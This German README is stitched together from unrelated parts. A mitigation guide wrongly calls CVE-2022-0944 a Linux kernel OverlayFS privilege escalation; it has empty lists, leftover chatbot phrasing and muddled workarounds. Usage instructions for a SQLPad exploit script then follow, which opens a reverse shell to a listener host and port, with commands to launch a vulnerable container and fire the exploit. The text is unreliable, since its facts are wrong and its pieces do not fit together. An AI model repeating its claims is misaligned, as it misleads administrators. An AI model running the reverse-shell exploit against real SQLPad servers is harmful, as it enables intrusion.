
Anleitung zur Ausnutzung und Behebung von CVE-2022-0944, einer Linux-Kernel-Privilegieneskalations-Schwachstelle in OverlayFS, mit Erkennungsskripten und Patch-Anweisungen.
Sicherheitshinweis und Anleitung zur Schadensbegrenzung für die Privilege-Escalation-Schwachstelle im OverlayFS des Linux-Kernels.
CVE-2022-0944 ist eine Sicherheitsschwachstelle im OverlayFS-Subsystem des Linux-Kernels, die es lokalen Angreifern ermöglicht, durch unsachgemäße Handhabung der Dateierstellung in bestimmten Konfigurationen Berechtigungen zu eskalieren.

🚨 Auswirkungen
Ein lokaler Angreifer könnte:
🔍 Erkennung
grep CVE-2022-0944 /var/log/apt/history.log
# Für RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944
4.🛡️ Schadensbegrenzung
Offizielle Patches
Aktualisieren Sie auf eine dieser gepatchten Versionen:
Befehl zum Aktualisieren:
sudo apt update && sudo apt upgrade linux-image-$(uname -r)
sudo yum update kernel
Umgehungen (falls kein sofortiger Patch verfügbar)
OverlayFS-Nutzung einschränken: sudo modprobe -r overlay
Namespace-Einschränkungen implementieren: # Erstelle unprivilegierten Benutzer-Namespace unshare -Ur
# Mounten mit Benutzereinschränkungen
mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
SELinux/AppArmor-Richtlinien anwenden: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }
⚠️ Haftungsausschluss Dieses Dokument dient nur zu Informationszwecken. Es wurde versucht, die Genauigkeit zu gewährleisten, es wird jedoch keine Garantie übernommen. Testen Sie Patches immer zuerst in einer Entwicklungsumgebung, bevor Sie sie in der Produktion einsetzen.
Letzte Aktualisierung: 2023-10-01 | Changelog anzeigen
Hauptmerkmale:
Dieses README-Format ist geeignet für:
Möchten Sie, dass ich:
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL zu SQLPad
lhost Listener-Host-Adresse für Reverse Shell
lport Listener-Port für Reverse Shell
username Anmeldename (optional)
password Anmeldekennwort (optional)
options:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm.
Beispiel:
# Abhängigkeiten installieren
pip install -r requirements.txt
# SQLPad-Docker-Container starten
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# Exploit auslösen
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Dieses Repository enthält Code und Werkzeuge, die ausschließlich zu Bildungszwecken bestimmt sind, insbesondere für die Verwendung in Cybersicherheitskursen und Lernumgebungen. Der Autor dieses Codes übernimmt keine Verantwortung für Folgen, die aus der Nutzung, dem Missbrauch oder der Änderung dieses Codes entstehen. Der Code wird "wie besehen" ohne jegliche Gewährleistung, weder ausdrücklich noch implizit, bereitgestellt, einschließlich, aber nicht beschränkt auf die stillschweigenden Gewährleistungen der Marktgängigkeit oder der Eignung für einen bestimmten Zweck.